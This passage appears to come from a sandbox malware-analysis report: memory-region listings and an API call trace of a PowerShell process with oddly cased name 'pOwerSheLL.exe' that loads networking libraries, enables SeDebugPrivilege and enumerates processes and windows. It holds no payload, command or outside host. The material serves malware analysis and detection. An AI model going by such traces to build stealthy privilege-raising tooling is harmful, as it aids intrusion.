"private_0x00000000055e0000" filename = "" Region: id = 684 start_va = 0x7ff4f000 end_va = 0x7ff4ffff entry_point = 0x0 region_type = private name = "private_0x000000007ff4f000" filename = "" Region: id = 685 start_va = 0x48f0000 end_va = 0x48f3fff entry_point = 0x48f0000 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 686 start_va = 0x76f00000 end_va = 0x77035fff entry_point = 0x76f01b35 region_type = mapped_file name = "urlmon.dll" filename = "\\Windows\\System32\\urlmon.dll" (normalized: "c:\\windows\\system32\\urlmon.dll") Region: id = 687 start_va = 0x77040000 end_va = 0x77134fff entry_point = 0x77041865 region_type = mapped_file name = "wininet.dll" filename = "\\Windows\\System32\\wininet.dll" (normalized: "c:\\windows\\system32\\wininet.dll") Region: id = 688 start_va = 0x76c60000 end_va = 0x76e5afff entry_point = 0x76c622d9 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll") Region: id = 689 start_va = 0x4900000 end_va = 0x4900fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004900000" filename = "" Region: id = 721 start_va = 0x73e80000 end_va = 0x73e88fff entry_point = 0x73e80000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Thread: id = 14 os_tid = 0xa6c [0025.167] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0025.857] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe [0025.857] SysStringByteLen (bstr="Microsoft.PowerShell.ConsoleHost, Version=1.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35, ProcessorArchitecture=msil") returned 0xfe [0025.857] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a [0025.857] SysStringByteLen (bstr="Microsoft.PowerShell.UnmanagedPSEntry") returned 0x4a [0026.775] GetVersionExW (in: lpVersionInformation=0xd2648*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0xd2648*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0026.775] GetLastError () returned 0x2 [0026.775] GetVersionExW (in: lpVersionInformation=0xd2648*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0xd2648*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0026.775] GetLastError () returned 0x2 [0026.780] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24e6cc, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0026.780] GetLastError () returned 0x2 [0026.785] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24e6e8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74 [0026.785] GetLastError () returned 0x2 [0026.785] GetVersionExW (in: lpVersionInformation=0xd2648*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0xd2648*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0026.785] GetLastError () returned 0x2 [0026.786] SetErrorMode (uMode=0x1) returned 0x1 [0026.787] GetFileAttributesExW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll" (normalized: "c:\\windows\\assembly\\gac_msil\\system.management.automation\\1.0.0.0__31bf3856ad364e35\\system.management.automation.dll"), fInfoLevelId=0x0, lpFileInformation=0x24eb68 | out: lpFileInformation=0x24eb68*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb7f02680, ftCreationTime.dwHighDateTime=0x1d2f5d2, ftLastAccessTime.dwLowDateTime=0xb7f02680, ftLastAccessTime.dwHighDateTime=0x1d2f5d2, ftLastWriteTime.dwLowDateTime=0xba2e5500, ftLastWriteTime.dwHighDateTime=0x1cb889e, nFileSizeHigh=0x0, nFileSizeLow=0x2df000)) returned 1 [0026.787] GetLastError () returned 0x2 [0026.787] SetErrorMode (uMode=0x1) returned 0x1 [0026.791] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpdwHandle=0x24ebec | out: lpdwHandle=0x24ebec) returned 0x94c [0026.793] GetLastError () returned 0x0 [0026.794] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", dwHandle=0x0, dwLen=0x94c, lpData=0x1f9755c | out: lpData=0x1f9755c) returned 1 [0026.799] VerQueryValueW (in: pBlock=0x1f9755c, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x24ebb8, puLen=0x24ebb4 | out: lplpBuffer=0x24ebb8*=0x1f975f8, puLen=0x24ebb4) returned 1 [0026.800] lstrlenW (lpString="䅁") returned 1 [0026.807] VerQueryValueW (in: pBlock=0x1f9755c, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x24eb34, puLen=0x24eb30 | out: lplpBuffer=0x24eb34*=0x1f976d4, puLen=0x24eb30) returned 1 [0026.808] lstrlenW (lpString="Microsoft Corporation") returned 21 [0026.810] lstrcpyW (in: lpString1=0xd2630, lpString2="Microsoft Corporation" | out: lpString1="Microsoft Corporation") returned="Microsoft Corporation" [0026.810] VerQueryValueW (in: pBlock=0x1f9755c, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x24eb34, puLen=0x24eb30 | out: lplpBuffer=0x24eb34*=0x1f97728, puLen=0x24eb30) returned 1 [0026.810] lstrlenW (lpString="System.Management.Automation") returned 28 [0026.810] lstrcpyW (in: lpString1=0xd2630, lpString2="System.Management.Automation" | out: lpString1="System.Management.Automation") returned="System.Management.Automation" [0026.810] VerQueryValueW (in: pBlock=0x1f9755c, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x24eb34, puLen=0x24eb30 | out: lplpBuffer=0x24eb34*=0x1f97784, puLen=0x24eb30) returned 1 [0026.810] lstrlenW (lpString="6.1.7601.17514") returned 14 [0026.810] lstrcpyW (in: lpString1=0xd2630, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514" [0026.810] VerQueryValueW (in: pBlock=0x1f9755c, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x24eb34, puLen=0x24eb30 | out: lplpBuffer=0x24eb34*=0x1f977c4, puLen=0x24eb30) returned 1 [0026.810] lstrlenW (lpString="System.Management.Automation.dll") returned 32 [0026.810] lstrcpyW (in: lpString1=0xd2630, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll" [0026.810] VerQueryValueW (in: pBlock=0x1f9755c, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x24eb34, puLen=0x24eb30 | out: lplpBuffer=0x24eb34*=0x1f9782c, puLen=0x24eb30) returned 1 [0026.810] lstrlenW (lpString="Copyright (c) Microsoft Corporation. All rights reserved.") returned 57 [0026.810] lstrcpyW (in: lpString1=0xd2630, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved." [0026.811] VerQueryValueW (in: pBlock=0x1f9755c, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x24eb34, puLen=0x24eb30 | out: lplpBuffer=0x24eb34*=0x1f978c8, puLen=0x24eb30) returned 1 [0026.811] lstrlenW (lpString="System.Management.Automation.dll") returned 32 [0026.811] lstrcpyW (in: lpString1=0xd2630, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll" [0026.811] VerQueryValueW (in: pBlock=0x1f9755c, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x24eb34, puLen=0x24eb30 | out: lplpBuffer=0x24eb34*=0x1f9792c, puLen=0x24eb30) returned 1 [0026.811] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42 [0026.811] lstrcpyW (in: lpString1=0xd2630, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System" [0026.811] VerQueryValueW (in: pBlock=0x1f9755c, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x24eb34, puLen=0x24eb30 | out: lplpBuffer=0x24eb34*=0x1f979a8, puLen=0x24eb30) returned 1 [0026.811] lstrlenW (lpString="6.1.7601.17514") returned 14 [0026.811] lstrcpyW (in: lpString1=0xd2630, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514" [0026.811] VerQueryValueW (in: pBlock=0x1f9755c, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x24eb34, puLen=0x24eb30 | out: lplpBuffer=0x24eb34*=0x1f97650, puLen=0x24eb30) returned 1 [0026.811] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49 [0026.811] lstrcpyW (in: lpString1=0xd2630, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly" [0026.811] VerQueryValueW (in: pBlock=0x1f9755c, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x24eb34, puLen=0x24eb30 | out: lplpBuffer=0x24eb34*=0x0, puLen=0x24eb30) returned 0 [0026.811] VerQueryValueW (in: pBlock=0x1f9755c, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x24eb34, puLen=0x24eb30 | out: lplpBuffer=0x24eb34*=0x0, puLen=0x24eb30) returned 0 [0026.811] VerQueryValueW (in: pBlock=0x1f9755c, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x24eb34, puLen=0x24eb30 | out: lplpBuffer=0x24eb34*=0x0, puLen=0x24eb30) returned 0 [0026.811] VerQueryValueW (in: pBlock=0x1f9755c, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x24eb28, puLen=0x24eb24 | out: lplpBuffer=0x24eb28*=0x1f975f8, puLen=0x24eb24) returned 1 [0026.812] VerLanguageNameW (in: wLang=0x0, szLang=0xd2630, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10 [0026.814] VerQueryValueW (in: pBlock=0x1f9755c, lpSubBlock="\\", lplpBuffer=0x24eb3c, puLen=0x24eb38 | out: lplpBuffer=0x24eb3c*=0x1f97584, puLen=0x24eb38) returned 1 [0026.820] GetCurrentProcessId () returned 0xa68 [0026.835] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0x24e374 | out: lpLuid=0x24e374*(LowPart=0x14, HighPart=0)) returned 1 [0026.836] GetLastError () returned 0x0 [0026.837] GetCurrentProcess () returned 0xffffffff [0026.837] GetLastError () returned 0x0 [0026.838] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x20, TokenHandle=0x24e370 | out: TokenHandle=0x24e370*=0x2e8) returned 1 [0026.838] GetLastError () returned 0x0 [0026.846] AdjustTokenPrivileges (in: TokenHandle=0x2e8, DisableAllPrivileges=0, NewState=0x1f9a09c*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0026.846] GetLastError () returned 0x514 [0026.848] CloseHandle (hObject=0x2e8) returned 1 [0026.848] GetLastError () returned 0x514 [0026.852] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xa68) returned 0x2e8 [0026.852] GetLastError () returned 0x514 [0026.860] EnumProcessModules (in: hProcess=0x2e8, lphModule=0x1f9a0e0, cb=0x100, lpcbNeeded=0x24eb64 | out: lphModule=0x1f9a0e0, lpcbNeeded=0x24eb64) returned 1 [0026.860] GetLastError () returned 0x514 [0026.864] GetModuleInformation (in: hProcess=0x2e8, hModule=0x22160000, lpmodinfo=0x1f9a220, cb=0xc | out: lpmodinfo=0x1f9a220*(lpBaseOfDll=0x22160000, SizeOfImage=0x72000, EntryPoint=0x22167363)) returned 1 [0026.864] GetLastError () returned 0x514 [0026.866] GetModuleBaseNameW (in: hProcess=0x2e8, hModule=0x22160000, lpBaseName=0xb5c60, nSize=0x800 | out: lpBaseName="pOwerSheLL.exe") returned 0xe [0026.866] GetLastError () returned 0x514 [0026.867] GetModuleFileNameExW (in: hProcess=0x2e8, hModule=0x22160000, lpFilename=0xb5c60, nSize=0x800 | out: lpFilename="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\pOwerSheLL.exe" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe")) returned 0x39 [0026.867] GetLastError () returned 0x514 [0026.868] CloseHandle (hObject=0x2e8) returned 1 [0026.868] GetLastError () returned 0x514 [0026.870] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0xa68) returned 0x2e8 [0026.870] GetLastError () returned 0x514 [0026.873] GetExitCodeProcess (in: hProcess=0x2e8, lpExitCode=0x1f996d0 | out: lpExitCode=0x1f996d0*=0x103) returned 1 [0026.873] GetLastError () returned 0x514 [0026.879] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x2f95278, Length=0x20000, ResultLength=0x24ebac | out: SystemInformation=0x2f95278, ResultLength=0x24ebac*=0xaba0) returned 0x0 [0026.900] EnumWindows (lpEnumFunc=0x1c23612, lParam=0x0) returned 1 [0026.902] GetWindowThreadProcessId (in: hWnd=0x10118, lpdwProcessId=0x24e800 | out: lpdwProcessId=0x24e800) returned 0x630 [0026.902] GetLastError () returned 0x514 [0026.902] GetWindowThreadProcessId (in: hWnd=0x10110, lpdwProcessId=0x24e800 | out: lpdwProcessId=0x24e800) returned 0x4f8 [0026.902] GetLastError () returned 0x514 [0026.903] GetWindowThreadProcessId (in: hWnd=0x200aa, lpdwProcessId=0x24e800 | out: lpdwProcessId=0x24e800) returned 0x64c [0026.903] GetLastError () returned 0x514 [0026.903] GetWindowThreadProcessId (in: hWnd=0x200c6, lpdwProcessId=0x24e800 | out: lpdwProcessId=0x24e800) returned 0x64c [0026.903] GetLastError () returned 0x514 [0026.903] GetWindowThreadProcessId (in: hWnd=0x200d6, lpdwProcessId=0x24e800 | out: lpdwProcessId=0x24e800) returned 0x64c [0026.903] GetLastError () returned 0x514 [0026.903] GetWindowThreadProcessId (in: hWnd=0x200c4, lpdwProcessId=0x24e800 | out: lpdwProcessId=0x24e800) returned 0x64c [0026.903] GetLastError () returned 0x514 [0026.903] GetWindowThreadProcessId (in: hWnd=0x1005e, lpdwProcessId=0x24e800 | out: lpdwProcessId=0x24e800) returned 0x64c [0026.903] GetLastError () returned 0x514 [0026.903] GetWindowThreadProcessId (in: hWnd=0x1005c, lpdwProcessId=0x24e800 | out: lpdwProcessId=0x24e800) returned 0x64c [0026.903] GetLastError () returned 0x514 [0026.903] GetWindowThreadProcessId (in: hWnd=0x10048, lpdwProcessId=0x24e800 | out: lpdwProcessId=0x24e800) returned 0x64c [0026.903] GetLastError () returned 0x514 [0026.903] GetWindowThreadProcessId (in: hWnd=0x10072, lpdwProcessId=0x24e800 | out: lpdwProcessId=0x24e800) returned 0x64c [0026.903] GetLastError () returned 0x514 [0026.903] GetWindowThreadProcessId (in: hWnd=0x10066, lpdwProcessId=0x24e800 | out: lpdwProcessId=0x24e800) returned 0x64c [0026.903] GetLastError () returned 0x514 [0026.903] GetWindowThreadProcessId (in: hWnd=0x10064, lpdwProcessId=0x24e800 | out: lpdwProcessId=0x24e800) returned 0x64c [0026.903] GetLastError () returned 0x514 [0026.903] GetWindowThreadProcessId (in: hWnd=0x10060, lpdwProcessId=0x24e800 | out: lpdwProcessId=0x24e800) returned 0x64c [0026.903] GetLastError () returned 0x514 [0026.903] GetWindowThreadProcessId (in: hWnd=0x10040, lpdwProcessId=0x24e800 | out: lpdwProcessId=0x24e800) returned 0x64c [0026.903] GetLastError () returned 0x514 [0026.904] GetWindowThreadProcessId (in: hWnd=0x1003c, lpdwProcessId=0x24e800 | out: lpdwProcessId=0x24e800) returned 0x64c [0026.904] GetLastError () returned 0x514 [0026.904] GetWindowThreadProcessId (in: hWnd=0x100d2, lpdwProcessId=0x24e800 | out: lpdwProcessId=0x24e800) returned 0x61c [0026.904] GetLastError () returned 0x514 [0026.904] GetWindowThreadProcessId (in: hWnd=0x5007c, lpdwProcessId=0x24e800 | out: lpdwProcessId=0x24e800) returned 0x64c [0026.904] GetLastError () returned 0x514 [0026.904] GetWindowThreadProcessId (in: hWnd=0x10074, lpdwProcessId=0x24e800 | out: lpdwProcessId=0x24e800) returned 0x64c [0026.904] GetLastError () returned 0x514 [0026.904] GetWindowThreadProcessId (in: hWnd=0x201b0, lpdwProcessId=0x24e800 | out: lpdwProcessId=0x24e800) returned 0xa6c [0026.904] GetLastError () returned 0x514 [0026.905] GetWindow (hWnd=0x201b0, uCmd=0x4) returned 0x0 [0026.906] IsWindowVisible (hWnd=0x201b0) returned 0 [0026.906] GetWindowThreadProcessId (in: hWnd=0x101f6, lpdwProcessId=0x24e800 | out: lpdwProcessId=0x24e800) returned 0x9c8 [0026.906] GetLastError () returned 0x514 [0026.906] GetWindowThreadProcessId (in: hWnd=0x201d4, lpdwProcessId=0x24e800 | out: lpdwProcessId=0x24e800) returned 0x9c8 [0026.907] GetLastError () returned 0x514 [0026.907] GetWindowThreadProcessId (in: hWnd=0x30106, lpdwProcessId=0x24e800 | out: lpdwProcessId=0x24e800) returned 0x9c8 [0026.907] GetLastError () returned 0x514 [0026.907] GetWindowThreadProcessId (in: hWnd=0x201d6, lpdwProcessId=0x24e800 | out: lpdwProcessId=0x24e800) returned 0x9c8 [0026.907] GetLastError () returned 0x514 [0026.907] GetWindowThreadProcessId (in: hWnd=0x101b8, lpdwProcessId=0x24e800 | out: lpdwProcessId=0x24e800) returned 0x9c8 [0026.907] GetLastError () returned 0x514 [0026.907] GetWindowThreadProcessId (in: hWnd=0x101ca, lpdwProcessId=0x24e800 | out: lpdwProcessId=0x24e800) returned 0x9fc [0026.907] GetLastError () returned 0x514 [0026.907] GetWindowThreadProcessId (in: hWnd=0x201c6, lpdwProcessId=0x24e800 | out: lpdwProcessId=0x24e800) returned 0x9c8 [0026.907] GetLastError () returned 0x514 [0026.907] GetWindowThreadProcessId (in: hWnd=0x101ba, lpdwProcessId=0x24e800 | out: lpdwProcessId=0x24e800) returned 0x9c8 [0026.907] GetLastError () returned 0x514 [0026.907] GetWindowThreadProcessId (in: hWnd=0x6019c, lpdwProcessId=0x24e800 | out: lpdwProcessId=0x24e800) returned 0x9c8 [0026.907] GetLastError () returned 0x514 [0026.907] GetWindowThreadProcessId (in: hWnd=0x10198, lpdwProcessId=0x24e800 | out: lpdwProcessId=0x24e800) returned 0x8fc [0026.907] GetLastError () returned 0x514 [0026.907] GetWindowThreadProcessId (in: hWnd=0x10194, lpdwProcessId=0x24e800 | out: lpdwProcessId=0x24e800) returned 0x8ec [0026.907] GetLastError () returned 0x514 [0026.907] GetWindowThreadProcessId (in: hWnd=0x10190, lpdwProcessId=0x24e800 | out: lpdwProcessId=0x24e800) returned 0x8dc [0026.907] GetLastError () returned 0x514 [0026.907] GetWindowThreadProcessId (in: hWnd=0x1018c, lpdwProcessId=0x24e800 | out: lpdwProcessId=0x24e800) returned 0x8cc [0026.907] GetLastError () returned 0x514 [0026.908] GetWindowThreadProcessId (in: hWnd=0x10188, lpdwProcessId=0x24e800 | out: lpdwProcessId=0x24e800) returned 0x8b8 [0026.908] GetLastError () returned 0x514 [0026.908] GetWindowThreadProcessId (in: hWnd=0x10184, lpdwProcessId=0x24e800 | out: lpdwProcessId=0x24e800) returned 0x8a8 [0026.908] GetLastError () returned 0x514 [0026.908] GetWindowThreadProcessId (in: hWnd=0x10180, lpdwProcessId=0x24e800 | out: lpdwProcessId=0x24e800) returned 0x898 [0026.908] GetLastError () returned 0x514 [0026.908] GetWindowThreadProcessId (in: hWnd=0x1017c, lpdwProcessId=0x24e800 | out: lpdwProcessId=0x24e800) returned 0x888 [0026.908] GetLastError () returned 0x514 [0026.908] GetWindowThreadProcessId (in: hWnd=0x10178, lpdwProcessId=0x24e800 | out: lpdwProcessId=0x24e800) returned 0x878 [0026.908] GetLastError () returned 0x514 [0026.908] GetWindowThreadProcessId (in: hWnd=0x10174, lpdwProcessId=0x24e800 | out: lpdwProcessId=0x24e800) returned 0x868 [0026.908] GetLastError () returned 0x514 [0026.908] GetWindowThreadProcessId (in: hWnd=0x10170, lpdwProcessId=0x24e800 | out: lpdwProcessId=0x24e800) returned 0x858 [0026.908] GetLastError () returned 0x514 [0026.908] GetWindowThreadProcessId (in: hWnd=0x1016c, lpdwProcessId=0x24e800 | out: lpdwProcessId=0x24e800) returned 0x848 [0026.908] GetLastError () returned 0x514 [0026.908] GetWindowThreadProcessId (in: hWnd=0x10168, lpdwProcessId=0x24e800 | out: lpdwProcessId=0x24e800) returned 0x838 [0026.908] GetLastError () returned 0x514 [0026.908] GetWindowThreadProcessId (in: hWnd=0x10164, lpdwProcessId=0x24e800 | out: lpdwProcessId=0x24e800) returned 0x828 [0026.908] GetLastError () returned 0x514 [0026.908] GetWindowThreadProcessId (in: hWnd=0x10160, lpdwProcessId=0x24e800 | out: lpdwProcessId=0x24e800) returned 0x818 [0026.908] GetLastError () returned 0x514 [0026.908] GetWindowThreadProcessId (in: hWnd=0x1015c, lpdwProcessId=0x24e800 | out: lpdwProcessId=0x24e800) returned 0x808 [0026.909] GetLastError () returned 0x514 [0026.909] GetWindowThreadProcessId (in: hWnd=0x10158, lpdwProcessId=0x24e800 | out: lpdwProcessId=0x24e800) returned 0x128 [0026.909] GetLastError () returned 0x514 [0026.909] GetWindowThreadProcessId (in: hWnd=0x20154, lpdwProcessId=0x24e800 | out: lpdwProcessId=0x24e800) returned 0x52c [0026.909] GetLastError () returned 0x514 [0026.909] GetWindowThreadProcessId (in: hWnd=0x10152, lpdwProcessId=0x24e800 | out: lpdwProcessId=0x24e800) returned 0x510 [0026.909] GetLastError () returned 0x514 [0026.909] GetWindowThreadProcessId (in: hWnd=0x1014c, lpdwProcessId=0x24e800 | out: lpdwProcessId=0x24e800) returned 0x420 [0026.909] GetLastError () returned 0x514 [0026.909] GetWindowThreadProcessId (in: hWnd=0x10146, lpdwProcessId=0x24e800 | out: lpdwProcessId=0x24e800) returned 0x424 [0026.909] GetLastError () returned 0x514 [0026.909] GetWindowThreadProcessId (in: hWnd=0x3013c, lpdwProcessId=0x24e800 | out: lpdwProcessId=0x24e800) returned 0x740 [0026.909] GetLastError () returned 0x514 [0026.909] GetWindowThreadProcessId (in: hWnd=0x30136, lpdwProcessId=0x24e800 | out: lpdwProcessId=0x24e800) returned 0x150 [0026.909] GetLastError () returned 0x514 [0026.909] GetWindowThreadProcessId (in: hWnd=0x10132, lpdwProcessId=0x24e800 | out: lpdwProcessId=0x24e800) returned 0x54c [0026.909] GetLastError () returned 0x514 [0026.909] GetWindowThreadProcessId (in: hWnd=0x10122, lpdwProcessId=0x24e800 | out: lpdwProcessId=0x24e800) returned 0x630 [0026.909] GetLastError () returned 0x514 [0026.909] GetWindowThreadProcessId (in: hWnd=0x10120, lpdwProcessId=0x24e800 | out: lpdwProcessId=0x24e800) returned 0x5e0 [0026.909] GetLastError () returned 0x514 [0026.909] GetWindowThreadProcessId (in: hWnd=0x20116, lpdwProcessId=0x24e800 | out: lpdwProcessId=0x24e800) returned 0x630 [0026.909] GetLastError () returned 0x514 [0026.910] GetWindowThreadProcessId (in: hWnd=0x1010a, lpdwProcessId=0x24e800 | out: lpdwProcessId=0x24e800) returned 0x5e0 [0026.910] GetLastError () returned 0x514 [0026.910] GetWindowThreadProcessId (in: hWnd=0x2001e, lpdwProcessId=0x24e800 | out: lpdwProcessId=0x24e800) returned 0x630 [0026.910] GetLastError () returned 0x514 [0026.910] GetWindowThreadProcessId (in: hWnd=0x2001c, lpdwProcessId=0x24e800 | out: lpdwProcessId=0x24e800) returned 0x54c [0026.910] GetLastError () returned 0x514 [0026.910] GetWindowThreadProcessId (in: hWnd=0x200ae, lpdwProcessId=0x24e800 | out: lpdwProcessId=0x24e800) returned 0x54c [0026.910] GetLastError () returned 0x514 [0026.910] GetWindowThreadProcessId (in: hWnd=0x2009e, lpdwProcessId=0x24e800 | out: lpdwProcessId=0x24e800) returned 0x64c [0026.910] GetLastError () returned 0x514 [0026.910] GetWindowThreadProcessId (in: hWnd=0x2008c, lpdwProcessId=0x24e800 | out: lpdwProcessId=0x24e800) returned 0x64c [0026.910] GetLastError () returned 0x514 [0026.910] GetWindowThreadProcessId (in: hWnd=0x2008e, lpdwProcessId=0x24e800 | out: lpdwProcessId=0x24e800) returned 0x64c [0026.910] GetLastError () returned 0x514 [0026.910] GetWindowThreadProcessId (in: hWnd=0x20092, lpdwProcessId=0x24e800 | out: lpdwProcessId=0x24e800) returned 0x64c [0026.910] GetLastError () returned 0x514 [0026.910] GetWindowThreadProcessId (in: hWnd=0x2009a, lpdwProcessId=0x24e800 | out: lpdwProcessId=0x24e800) returned 0x64c [0026.910] GetLastError () returned 0x514 [0026.910] GetWindowThreadProcessId (in: hWnd=0x300a8, lpdwProcessId=0x24e800 | out: lpdwProcessId=0x24e800) returned 0x64c [0026.910] GetLastError () returned 0x514 [0026.910] GetWindowThreadProcessId (in: hWnd=0x20080, lpdwProcessId=0x24e800 | out: lpdwProcessId=0x24e800) returned 0x64c [0026.910] GetLastError () returned 0x514 [0026.910] GetWindowThreadProcessId (in: hWnd=0x100f6, lpdwProcessId=0x24e800 | out: lpdwProcessId=0x24e800) returned 0x228 [0026.910] GetLastError () returned 0x514 [0026.911] GetWindowThreadProcessId (in: hWnd=0x100f0, lpdwProcessId=0x24e800 | out: lpdwProcessId=0x24e800) returned 0x294 [0026.911] GetLastError () returned 0x514 [0026.911] GetWindowThreadProcessId (in: hWnd=0x100e8, lpdwProcessId=0x24e800 | out: lpdwProcessId=0x24e800) returned 0x7c4 [0026.911] GetLastError () returned 0x514 [0026.911] GetWindowThreadProcessId (in: hWnd=0x100dc, lpdwProcessId=0x24e800 | out: lpdwProcessId=0x24e800) returned 0x76c [0026.911] GetLastError () returned 0x514 [0026.911] GetWindowThreadProcessId (in: hWnd=0x100e2, lpdwProcessId=0x24e800 | out: lpdwProcessId=0x24e800) returned 0x61c [0026.911] GetLastError () returned 0x514 [0026.911] GetWindowThreadProcessId (in: hWnd=0x100da, lpdwProcessId=0x24e800 | out: lpdwProcessId=0x24e800) returned 0x764 [0026.911] GetLastError () returned 0x514 [0026.911] GetWindowThreadProcessId (in: hWnd=0x50076, lpdwProcessId=0x24e800 | out: lpdwProcessId=0x24e800) returned 0x64c [0026.911] GetLastError () returned 0x514 [0026.911] GetWindowThreadProcessId (in: hWnd=0x1006c, lpdwProcessId=0x24e800 | out: lpdwProcessId=0x24e800) returned 0x730 [0026.911] GetLastError () returned 0x514 [0026.911] GetWindowThreadProcessId (in: hWnd=0x1006a, lpdwProcessId=0x24e800 | out: lpdwProcessId=0x24e800) returned 0x64c [0026.911] GetLastError () returned 0x514 [0026.911] GetWindowThreadProcessId (in: hWnd=0x10062, lpdwProcessId=0x24e800 | out: lpdwProcessId=0x24e800) returned 0x64c [0026.911] GetLastError () returned 0x514 [0026.911] GetWindowThreadProcessId (in: hWnd=0x10050, lpdwProcessId=0x24e800 | out: lpdwProcessId=0x24e800) returned 0x64c [0026.911] GetLastError () returned 0x514 [0026.911] GetWindowThreadProcessId (in: hWnd=0x10100, lpdwProcessId=0x24e800 | out: lpdwProcessId=0x24e800) returned 0x404 [0026.911] GetLastError () returned 0x514 [0026.912] 